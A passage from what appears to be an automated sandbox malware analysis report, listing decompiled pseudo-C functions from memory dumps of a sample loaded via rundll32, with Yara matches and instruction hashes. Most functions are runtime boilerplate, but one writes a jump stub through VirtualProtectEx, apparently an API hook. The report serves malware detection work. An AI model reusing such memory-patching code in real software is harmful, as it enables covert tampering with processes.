				 *(_t117 + 0x36) =  *(_t117 + 0x36) & 0x00000000;
				 *((short*)(_t117 + 0x34)) = 0x25ff;
				 *((long long*)(_t117 + 0x3a)) = _t94 +  *((intOrPtr*)(_t97 + 1));
				_t128 =  *((intOrPtr*)(_t97 + 1));
				if (_t128 == 0) goto 0x205ca714;
				 *_t128 = _a24;
				 *((char*)(_t128 + 4)) = _a28;
				r8d =  *(_t97 + 9) & 0x000000ff;
				r9d = _a32;
				_v40 =  &_a32;
				VirtualProtectEx(??, ??, ??, ??, ??); // executed
				return 1;
			}




























                0x215205ca568
                0x215205ca56d
                0x215205ca572
                0x215205ca57e
                0x215205ca582
                0x215205ca585
                0x215205ca58c
                0x215205ca58f
                0x215205ca592
                0x215205ca597
                0x215205ca59b
                0x215205ca5a6
                0x215205ca5ad
                0x215205ca5af
                0x215205ca5b4
                0x215205ca5b7
                0x215205ca5ba
                0x215205ca5c3
                0x215205ca5ca
                0x215205ca5cc
                0x215205ca5d2
                0x215205ca5d4
                0x215205ca5d6
                0x215205ca5dd
                0x215205ca5df
                0x215205ca5e4
                0x215205ca5eb
                0x215205ca5f0
                0x215205ca5f5
                0x215205ca5fa
                0x215205ca600
                0x215205ca602
                0x215205ca608
                0x215205ca60b
                0x215205ca612
                0x215205ca616
                0x215205ca61d
                0x215205ca621
                0x215205ca629
                0x215205ca633
                0x215205ca638
                0x215205ca638
                0x215205ca63f
                0x215205ca64b
                0x215205ca653
                0x215205ca658
                0x215205ca65a
                0x215205ca65e
                0x215205ca660
                0x215205ca664
                0x215205ca66b
                0x215205ca670
                0x215205ca672
                0x215205ca674
                0x215205ca67b
                0x215205ca684
                0x215205ca686
                0x215205ca68a
                0x215205ca68d
                0x215205ca6a0
                0x215205ca6a6
                0x215205ca6aa
                0x215205ca6b0
                0x215205ca6bb
                0x215205ca6c2
                0x215205ca6c7
                0x215205ca6d0
                0x215205ca6d5
                0x215205ca6da
                0x215205ca6e2
                0x215205ca6e8
                0x215205ca6ec
                0x215205ca6f8
                0x215205ca6fc
                0x215205ca703
                0x215205ca709
                0x215205ca710
                0x215205ca714
                0x215205ca71e
                0x215205ca726
                0x215205ca72f
                0x215205ca746

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 4bf50c46bb647c84ff8375c8539a0b715aed05018f51fe42ab3b111d6a1aa26d
                • Instruction ID: 634c4f78c9f03c43ce1fc5f65ba713e24c0bd2fa6a89e08c7683f3170d9ce62f
                • Opcode Fuzzy Hash: 4bf50c46bb647c84ff8375c8539a0b715aed05018f51fe42ab3b111d6a1aa26d
                • Instruction Fuzzy Hash: 2651A3B3707BA0CAEB508F25A6083997BA1FBA4BA8F08C255EE55076D9DB38D451C710
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E229C Relevance: 3.1, APIs: 2, Instructions: 60memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E00007FFA7FFA535E229C(void* __edx, long long __rbx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				void* _t34;
				void* _t35;
				void* _t37;
				void* _t39;
				void* _t66;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				if (__rsi !=  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x240)) + 0x68)) - 0x1582) goto 0x535e22da;
				goto 0x535e23b3;
				GetProcessHeap();
				if (0 == 0) goto 0x535e2398;
				RtlAllocateHeap(??, ??, ??); // executed
				 *( *((intOrPtr*)(__r8 + 0x160)) + 0x300) =  *( *((intOrPtr*)(__r8 + 0x160)) + 0x300) * ( *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x3c8)) - _t66);
				 *((long long*)( *((intOrPtr*)(__r8 + 0x5e8)) + 0x128)) =  *((intOrPtr*)(__r8 + 0x2a0)) + 0xc8;
				_t34 = E00007FFA7FFA535E3F50(_t35, __edx, _t37, _t39, 0,  *( *((intOrPtr*)(__r8 + 0x2a0)) + 0x70) ^ 0x00001487, 0, __rsi);
				 *(__r8 + 0x300) =  *(__r8 + 0x300) |  *((intOrPtr*)(__r8 + 0x358)) + 0x000005d8;
				 *( *((intOrPtr*)(__r8 + 0x108)) + 0x188) =  *( *((intOrPtr*)(__r8 + 0x108)) + 0x188) ^  *((intOrPtr*)(__r8 + 0x240)) + 0x00000108;
				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x20)) + 0x5d0)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x20)) + 0x5d0)) + ( *( *((intOrPtr*)(__r8 + 0x20)) + 0x418) | 0x000011f1);
				return _t34;
			}









                0x7ffa535e229c
                0x7ffa535e22a1
                0x7ffa535e22a6
                0x7ffa535e22d1
                0x7ffa535e22d5
                0x7ffa535e22e8
                0x7ffa535e22f1
                0x7ffa535e22ff
                0x7ffa535e232e
                0x7ffa535e234a
                0x7ffa535e2364
                0x7ffa535e237d
                0x7ffa535e2391
                0x7ffa535e23a9
                0x7ffa535e23c7

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Heap$AllocateProcess
                • String ID:
                • API String ID: 1357844191-0
                • Opcode ID: 1bea795867cdc67a9f243395745fc9de72f20c6a38becadefaa0d8232ff38c6f
                • Instruction ID: 3c4552c6bf6584dfca272622f1ad2bc4cfabb9254a2c1859b8f8bf6e45a5c22c
                • Opcode Fuzzy Hash: 1bea795867cdc67a9f243395745fc9de72f20c6a38becadefaa0d8232ff38c6f
                • Instruction Fuzzy Hash: AD213772715F8486EB84CF6AE4843AD6369FB89F88F184036DF4D97769DE38D1928700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D09D0 Relevance: 3.0, APIs: 2, Instructions: 39memoryCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 65%
                			E00000215215205D09D0(long long __rax, long long __rbx, signed long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v32;
				signed int _v40;
				void* __rdi;
				void* _t13;
				void* _t15;
				long long _t20;
				long long _t23;
				signed long long* _t31;
				void* _t33;
				void* _t35;
				void* _t42;

				_t20 = __rax;
				_v32 = 0xfffffffe;
				_a8 = __rbx;
				_a32 = __rsi;
				_t33 = __r9;
				_t42 = __rdx;
				_t31 = __rcx;
				_v40 = _v40 & 0x00000000;
				E00000215215205D15B8(_t13, __rcx, __r8);
				_t23 = _t20;
				_a16 = _t20;
				_a24 = _t20;
				if (_t20 == 0) goto 0x205d0a2c;
				_t15 = E00000215215205D0950(_t23, _t20, _t42, __r8, _t33); // executed
				 *_t31 =  *_t31 & 0x00000000;
				_t31[1] = _t31[1] & 0x00000000;
				_t10 = _t23 + 0x10; // 0x10
				return E00000215215205D135C(_t15, _t23, _t31, _t10, _t31, _t33, _t35, _t23);
			}














                0x215205d09d0
                0x215205d09da
                0x215205d09e3
                0x215205d09e8
                0x215205d09ed
                0x215205d09f3
                0x215205d09f6
                0x215205d09f9
                0x215205d0a03
                0x215205d0a08
                0x215205d0a0b
                0x215205d0a10
                0x215205d0a18
                0x215205d0a26
                0x215205d0a2c
                0x215205d0a30
                0x215205d0a35
                0x215205d0a5a

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$AllocPtr::__Ptr_baseStatic
                • String ID:
                • API String ID: 2446911711-0
                • Opcode ID: 3ee81a84e783e839f3571ab78e40daf51b1fb701907726a107132894d7ed6ea7
                • Instruction ID: 9b5cad87b8bcdb4ce75d5520d071c55f1781befbcf8db9c69bf7ece3042f6f88
                • Opcode Fuzzy Hash: 3ee81a84e783e839f3571ab78e40daf51b1fb701907726a107132894d7ed6ea7
                • Instruction Fuzzy Hash: 1101AD33315B9082E6008B52B94439AA3A0FB99BF4F144629AEA807BDADB7CC0528704
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E1000 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E00007FFA7FFA535E1000(signed int __rax, void* __rcx, long long __rsi, long long _a8, signed int _a24, intOrPtr _a40, intOrPtr _a48) {
				void* __rdi;
				int _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t46;
				intOrPtr _t52;

				_a8 = __rsi;
				_t52 =  *((intOrPtr*)(__rcx + 0x20));
				_t46 = __rcx;
				r10d =  *((intOrPtr*)(_t52 + 0x340));
				_a24 = _a24 & 0x00000000;
				r10d = r10d - 0x11e4;
				 *(_t52 + 0x370) =  *(_t52 + 0x370) * __rax;
				r8d =  *( *((intOrPtr*)(__rcx + 0x160)) + 0x68);
				r8d = r8d - 0x1542; // executed
				VirtualProtect(??, ??, ??, ??);
				E00007FFA7FFA535E3B00(_t27, _t28, _t29, _t30, _a40, _a48, r10d, __rcx, r10d);
				r8d = _a24;
				_t26 = VirtualProtect(??, ??, ??, ??);
				 *((long long*)( *((intOrPtr*)(_t46 + 0x5e8)) + 0x298)) =  *((long long*)( *((intOrPtr*)(_t46 + 0x5e8)) + 0x298)) + 0xfffff0d4;
				return _t26;
			}











                0x7ffa535e1000
                0x7ffa535e100a
                0x7ffa535e100e
                0x7ffa535e1014
                0x7ffa535e101b
                0x7ffa535e1020
                0x7ffa535e1035
                0x7ffa535e1050
                0x7ffa535e1054
                0x7ffa535e105b
                0x7ffa535e106e
                0x7ffa535e1073
                0x7ffa535e1085
                0x7ffa535e1097
                0x7ffa535e10a7

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: f5f476bd7e3daf250e3b35d32f77d0721671b514eaff16d4f955099b3bcacd9e
                • Instruction ID: cea36da8b33cbcf1c87d44d3f7d87b87c2e7ac6f636685ded835bec845f37d4d
                • Opcode Fuzzy Hash: f5f476bd7e3daf250e3b35d32f77d0721671b514eaff16d4f955099b3bcacd9e
                • Instruction Fuzzy Hash: 61016977218AD083C7558BA6E44429EB775F789BE0F104212EFAD07B98CF78D651CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205F4F78 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E00000215215205F4F78(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t2 =  ==  ? 1 :  *0x20681dd8 & 0x000000ff;
				 *0x20681dd8 =  ==  ? 1 :  *0x20681dd8 & 0x000000ff;
				E00000215215205F5BFC(1, _t12, _t17, _t18, _t19, _t20);
				if (E00000215215205F9AF8() != 0) goto 0x205f4fa7;
				goto 0x205f4fbb; // executed
				E000002152152060BC90(_t17); // executed
				if (0 != 0) goto 0x205f4fb9;
				E00000215215205F9B54(0);
				goto 0x205f4fa3;
				return 1;
			}









                0x215205f4f8c
                0x215205f4f8f
                0x215205f4f95
                0x215205f4fa1
                0x215205f4fa5
                0x215205f4fa7
                0x215205f4fae
                0x215205f4fb2
                0x215205f4fb7
                0x215205f4fc0

                APIs
                • __vcrt_initialize.LIBVCRUNTIME ref: 00000215205F4F9A
                  • Part of subcall function 00000215205F9AF8: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00000215205F9AFC
                  • Part of subcall function 00000215205F9AF8: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00000215205F9B01
                  • Part of subcall function 00000215205F9AF8: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00000215205F9B06
                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00000215205F4FB2
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: __vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                • String ID:
                • API String ID: 3381670000-0
                • Opcode ID: 0406b4c93419378f1691c4e5f4c2e4d142f802894aa7c883ff8141f946f1c700
                • Instruction ID: d8c7cadf3eaf715eb93ffdeea912cdd111c365fc62d798de0497262b929e5fa5
                • Opcode Fuzzy Hash: 0406b4c93419378f1691c4e5f4c2e4d142f802894aa7c883ff8141f946f1c700
                • Instruction Fuzzy Hash: C9E04F7270BD70C2FF692771208E3E912902FFB300F6450D8AC9A462CF842D849E2A20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060B70C Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                Download Yara Rule
                C-Code - Quality: 19%
                			E000002152152060B70C(signed int __esi, long long __rbx, void* __rdx, long long __rsi, signed long long*** __r8, long long __r9, long long _a8, long long _a16, long long _a32) {
				signed long long _v48;
				signed long long _v56;
				signed long long _v64;
				signed long long _v72;
				signed long long _t50;
				intOrPtr* _t54;
				signed long long _t57;
				signed long long _t61;
				signed long long _t62;
				signed long long _t63;
				signed long long _t72;
				signed long long _t73;
				signed int* _t74;
				signed long long _t77;
				signed long long _t81;
				signed long long _t82;
				signed long long _t84;
				signed long long _t92;
				signed long long*** _t97;

				_a8 = __rbx;
				_a16 = __rsi;
				_a32 = __r9;
				_t97 = __r8;
				E0000021521520603CEC();
				_t72 =  *((intOrPtr*)( *((intOrPtr*)(__r8))));
				if (_t72 != 0) goto 0x2060b74a;
				goto 0x2060b88a;
				_t81 =  *0x2067c720; // 0xca1645d940e
				r8d = __esi;
				r8d = r8d & 0x0000003f;
				_t77 = _t81 ^  *_t72;
				asm("dec eax");
				_v56 = _t77;
				_t61 = _t81 ^  *(_t72 + 8);
				asm("dec eax");
				_v72 = _t61;
				_t7 = _t77 - 1; // 0xca1645d940d
				_t50 = _t7;
				if (_t50 - 0xfffffffd > 0) goto 0x2060b880;
				_v64 = _t77;
				_v48 = _t61;
				r13d = 0x40;
				asm("dec eax");
				_t62 = _t61 - 8;
				_v72 = _t62;
				if (_t62 - _t77 < 0) goto 0x2060b7c4;
				if ( *_t62 != (_t50 ^ _t81)) goto 0x2060b7bf;
				goto 0x2060b7aa;
				if (_t62 - _t77 >= 0) goto 0x2060b80e;
				_t63 = _t62 | 0xffffffff;
				if (_t77 == _t63) goto 0x2060b7dc;
				E000002152152060A780(_t50 ^ _t81, _t77);
				_t82 =  *0x2067c720; // 0xca1645d940e
				r13d = r13d - (__esi & 0x0000003f);
				asm("dec eax");
				_t73 = _t72 ^ _t82;
				 *( *( *_t97)) = _t73;
				( *( *_t97))[1] = _t73;
				_t54 =  *_t97;
				 *( *_t54 + 0x10) = _t73;
				goto 0x2060b880;
				asm("dec eax");
				 *_t63 = _t54;
				 *0x20627698(); // executed
				TlsFree(??); // executed
				_t74 =  *( *_t97);
				_t84 =  *0x2067c720; // 0xca1645d940e
				r8d = __esi;
				r8d = r8d & 0x0000003f;
				_t92 = _t84 ^  *_t74;
				asm("dec ecx");
				_t57 = _t74[2] ^ _t84;
				asm("dec eax");
				if (_t92 != _t77) goto 0x2060b85b;
				if (_t57 == _t61) goto 0x2060b87b;
				_v64 = _t92;
				_v56 = _t92;
				_v48 = _t57;
				_v72 = _t57;
				goto 0x2060b79c;
				E0000021521520603D40();
				return 0;
			}






















                0x2152060b70c
                0x2152060b711
                0x2152060b716
                0x2152060b72b
                0x2152060b730
                0x2152060b739
                0x2152060b73f
                0x2152060b745
                0x2152060b74a
                0x2152060b751
                0x2152060b754
                0x2152060b75b
                0x2152060b761
                0x2152060b764
                0x2152060b76c
                0x2152060b770
                0x2152060b773
                0x2152060b778
                0x2152060b778
                0x2152060b780
                0x2152060b789
                0x2152060b791
                0x2152060b796
                0x2152060b7a4
                0x2152060b7aa
                0x2152060b7ae
                0x2152060b7b6
                0x2152060b7bb
                0x2152060b7bd
                0x2152060b7c2
                0x2152060b7c4
                0x2152060b7cb
                0x2152060b7d0
                0x2152060b7d5
                0x2152060b7e1
                0x2152060b7e9
                0x2152060b7ec
                0x2152060b7f5
                0x2152060b7fe
                0x2152060b802
                0x2152060b808
                0x2152060b80c
                0x2152060b816
                0x2152060b819
                0x2152060b81f
                0x2152060b825
                0x2152060b82a
                0x2152060b82d
                0x2152060b834
                0x2152060b837
                0x2152060b83e
                0x2152060b844
                0x2152060b84b
                0x2152060b84e
                0x2152060b854
                0x2152060b859
                0x2152060b85e
                0x2152060b866
                0x2152060b86e
                0x2152060b876
                0x2152060b87b
                0x2152060b88c
                0x2152060b8aa

                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 69ab4f87d4ed671cd3057637d2d326f493590c95839ed9e94bbdcf417b247d1c
                • Instruction ID: 41b11263adec4e5452355fa670ff2e739c7bbfac6f959041df80f811bc1c6f0d
                • Opcode Fuzzy Hash: 69ab4f87d4ed671cd3057637d2d326f493590c95839ed9e94bbdcf417b247d1c
                • Instruction Fuzzy Hash: DD418133312F64C1EA24CB15E45429AB3A6F7E8FE4F149215DEA907BE8EF38D4518740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060ADA0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E000002152152060ADA0(void* __ecx, void* __edx, void* __edi, long long __rbx, long long __rdi, long long __rsi, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t28;
				void* _t46;
				signed long long _t61;
				long long _t63;
				intOrPtr* _t66;
				signed long long _t67;
				signed long long _t76;
				signed long long _t81;
				void* _t84;
				void* _t85;
				WCHAR* _t88;

				_t79 = __rsi;
				_t63 = __rbx;
				_t61 = _t81;
				 *((long long*)(_t61 + 8)) = __rbx;
				 *((long long*)(_t61 + 0x10)) = __rsi;
				 *((long long*)(_t61 + 0x18)) = __rdi;
				 *((long long*)(_t61 + 0x20)) = __r14;
				_t46 = r8d;
				r14d = __ecx;
				if (r8d != 0) goto 0x2060ae10;
				GetModuleHandleW(_t88);
				if (_t61 == 0) goto 0x2060ae10;
				if ( *_t61 != 0x5a4d) goto 0x2060ae10;
				_t66 =  *((intOrPtr*)(_t61 + 0x3c)) + _t61;
				if ( *_t66 != 0x4550) goto 0x2060ae10;
				if ( *((intOrPtr*)(_t66 + 0x18)) != 0x20b) goto 0x2060ae10;
				if ( *((intOrPtr*)(_t66 + 0x84)) - 0xe <= 0) goto 0x2060ae10;
				if ( *((intOrPtr*)(_t66 + 0xf8)) == _t46) goto 0x2060ae10;
				E000002152152060AF58(0x20b, r14d, _t61, __rbx);
				E0000021521520603CEC();
				if ( *0x20682800 != 0) goto 0x2060aeda;
				r15d = 1;
				 *0x206827f0 = r15d;
				if (__edx != 0) goto 0x2060ae83;
				_t76 =  *0x2067c720; // 0xca1645d940e
				asm("dec eax");
				_t62 = _t61 ^ _t76;
				_t67 =  *0x206827f8; // 0xca1645d940e
				if (_t67 == (_t61 ^ _t76)) goto 0x2060ae7a;
				asm("dec eax");
				 *0x20627698();
				r8d = 0;
				 *(_t76 ^ _t67)();
				goto 0x2060ae8f;
				if (__edx != r15d) goto 0x2060ae95;
				E000002152152060BA98(0x20682950); // executed
				if (__edx != 0) goto 0x2060aeac;
				E000002152152060BCEC(_t63, 0x20627880, 0x206278a0, _t76 ^ _t67, __rsi);
				E000002152152060BCEC(_t63, 0x206278a8, 0x206278b0, _t76 ^ _t67, _t79);
				_t27 =  ==  ? r15d :  *0x20682800 & 0x000000ff;
				 *0x20682800 =  ==  ? r15d :  *0x20682800 & 0x000000ff;
				_t28 = E00000215215205FB034(_t62, _t63, 0x206278b0, _t84, _t85);
				E0000021521520603D40();
				if (_t46 != 0) goto 0x2060aef1;
				E000002152152060AF0C();
				asm("int3");
				return _t28;
			}














                0x2152060ada0
                0x2152060ada0
                0x2152060ada0
                0x2152060ada3
                0x2152060ada7
                0x2152060adab
                0x2152060adaf
                0x2152060adb9
                0x2152060adbe
                0x2152060adc4
                0x2152060adc8
                0x2152060add1
                0x2152060addb
                0x2152060ade1
                0x2152060adea
                0x2152060adf5
                0x2152060adfe
                0x2152060ae06
                0x2152060ae0b
                0x2152060ae15
                0x2152060ae22
                0x2152060ae28
                0x2152060ae31
                0x2152060ae39
                0x2152060ae3b
                0x2152060ae4e
                0x2152060ae51
                0x2152060ae54
                0x2152060ae5e
                0x2152060ae65
                0x2152060ae6b
                0x2152060ae71
                0x2152060ae78
                0x2152060ae81
                0x2152060ae86
                0x2152060ae8f
                0x2152060ae97
                0x2152060aea7
                0x2152060aeba
                0x2152060aec8
                0x2152060aecc
                0x2152060aed4
                0x2152060aedf
                0x2152060aee6
                0x2152060aeeb
                0x2152060aef0
                0x2152060af0b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModule$AddressFreeLibraryProc
                • String ID:
                • API String ID: 3947729631-0
                • Opcode ID: 849623d9c797c720e54815ebb49edc999433eb98e2be7115e3a12f13f8e5b1a2
                • Instruction ID: 025186e8fc4e1ae052990e71c4d78b9e630aa8168f8e35c1e01668ab3a699e95
                • Opcode Fuzzy Hash: 849623d9c797c720e54815ebb49edc999433eb98e2be7115e3a12f13f8e5b1a2
                • Instruction Fuzzy Hash: F8419D33243E31C6FB349B15D4583EA23A2FFF0B80F2454A9DE0947699DB3AE8859340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EFE8C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                Download Yara Rule
                C-Code - Quality: 63%
                			E00007FFA7FFA535EFE8C(void* __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __rdi, long long __rsi, void* __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				long long _v24;
				long long _t35;
				long long _t36;
				long long _t37;

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (0 != 0) goto 0x535efec9;
				E00007FFA7FFA535E8380(0);
				goto 0x535eff2d;
				 *0x9BE8188948FB8B51();
				_v24 = 0x9;
				_t35 =  *0x53755250; // 0x40
				if (__rcx - _t35 < 0) goto 0x535eff21;
				if ( *((intOrPtr*)(0x53754e50 + __rdi * 8)) == 0x9) goto 0x535efef5;
				goto 0x535eff17; // executed
				E00007FFA7FFA535EFDA4( *((intOrPtr*)(0x53754e50 + __rdi * 8)) - 0x9, _t35, 0x9, 0x7, __rdx, __rcx, __rbp, __r9); // executed
				 *((long long*)(0x53754e50 + __rdi * 8)) = _t35;
				if (_t35 != 0) goto 0x535eff08;
				goto 0x535eff21;
				_t36 =  *0x53755250; // 0x40
				_t37 = _t36 + 0x40;
				 *0x53755250 = _t37;
				_v24 = __rdi + 1;
				goto 0x535efee2;
				asm("invalid");
				return _t37;
			}







                0x7ffa535efe8c
                0x7ffa535efe91
                0x7ffa535efe96
                0x7ffa535efeb2
                0x7ffa535efeb4
                0x7ffa535efec7
                0x7ffa535efed2
                0x7ffa535efed8
                0x7ffa535efedc
                0x7ffa535efee4
                0x7ffa535efef1
                0x7ffa535efef3
                0x7ffa535efef5
                0x7ffa535efefa
                0x7ffa535eff01
                0x7ffa535eff06
                0x7ffa535eff08
                0x7ffa535eff0e
                0x7ffa535eff11
                0x7ffa535eff1a
                0x7ffa535eff1f
                0x7ffa535eff2a
                0x7ffa535eff42

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: f182c36d18bb0558c4e136d7a85a6dd1f9f42aaf76e98a9eed0fe9a62827462d
                • Instruction ID: bf7679defbbe6ecab329ff359acfa1e7b28f8dd3f48751efd3df88309eeae16a
                • Opcode Fuzzy Hash: f182c36d18bb0558c4e136d7a85a6dd1f9f42aaf76e98a9eed0fe9a62827462d
                • Instruction Fuzzy Hash: ED114C22D2DF828AF6109F50A44057963AAFFC2780F5EA075F69D67796DF2CF800A750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215206169C8 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00000215215206169C8(void* __ecx, void* __edx, long long __rax, signed int __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				long long _v24;
				void* _t18;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t24;
				void* _t32;
				long long _t39;
				signed long long _t45;

				_t39 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t32 = __ecx;
				if ((0 | __ecx - 0x00002000 > 0x00000000) != 0) goto 0x20616a05;
				_t18 = E0000021521520603944(__rax);
				 *((intOrPtr*)(__rax)) = 9;
				E00000215215205FAABC(_t18);
				goto 0x20616a69;
				E0000021521520603CEC();
				_t45 = __rbx;
				_v24 = __rbx;
				_t21 =  *0x20682f40; // 0x40
				if (_t32 - _t21 < 0) goto 0x20616a5d;
				if ( *((intOrPtr*)(0x20682b40 + __rbx * 8)) == __rbx) goto 0x20616a31;
				goto 0x20616a53; // executed
				E00000215215206168E0( *((intOrPtr*)(0x20682b40 + __rbx * 8)) - __rbx, __rax, __rbx, __rcx, __rdx, __rsi, __rbp, __r9); // executed
				 *((long long*)(0x20682b40 + _t45 * 8)) = _t39;
				if (_t39 != 0) goto 0x20616a44;
				goto 0x20616a5d;
				_t23 =  *0x20682f40; // 0x40
				_t24 = _t23 + 0x40;
				 *0x20682f40 = _t24;
				_v24 = _t45 + 1;
				goto 0x20616a1e;
				E0000021521520603D40();
				goto 0x20616a01;
				return _t24;
			}











                0x215206169c8
                0x215206169c8
                0x215206169cd
                0x215206169d2
                0x215206169dd
                0x215206169ee
                0x215206169f0
                0x215206169fa
                0x215206169fc
                0x21520616a03
                0x21520616a0a
                0x21520616a10
                0x21520616a13
                0x21520616a18
                0x21520616a20
                0x21520616a2d
                0x21520616a2f
                0x21520616a31
                0x21520616a36
                0x21520616a3d
                0x21520616a42
                0x21520616a44
                0x21520616a4a
